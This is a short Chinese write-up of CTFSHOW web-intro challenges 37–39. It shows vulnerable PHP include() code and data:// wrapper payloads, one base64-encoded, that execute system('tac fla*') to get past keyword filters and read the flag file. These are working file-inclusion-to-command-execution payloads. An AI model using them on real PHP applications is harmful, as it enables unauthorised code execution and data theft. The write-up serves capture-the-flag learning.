CTFSHOW web入门 web37-web39

web37

/?c=data://text/plain,<?php system("tac fla*");?>

Web38

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
} 

过滤了php所以上面那个不能用了，可以这样写

?c=data://text/plain,<?= system("tac fla*");?>

这里是使用短标签=来代替php

或者使用base64编码一下

?c=data://text/plain;base64,PD89IHN5c3RlbSgidGFjIGZsYSoucCpwIik7Pz4=

web39

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
} 

可以发现这里给传入的c加了个后缀，借用直接给的hint来说data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了，所以后面的.php会被当成html页面直接显示在页面上，起不到什么 作用

仍然使用上题的payload

?c=data://text/plain,<?=system("tac fla*");?>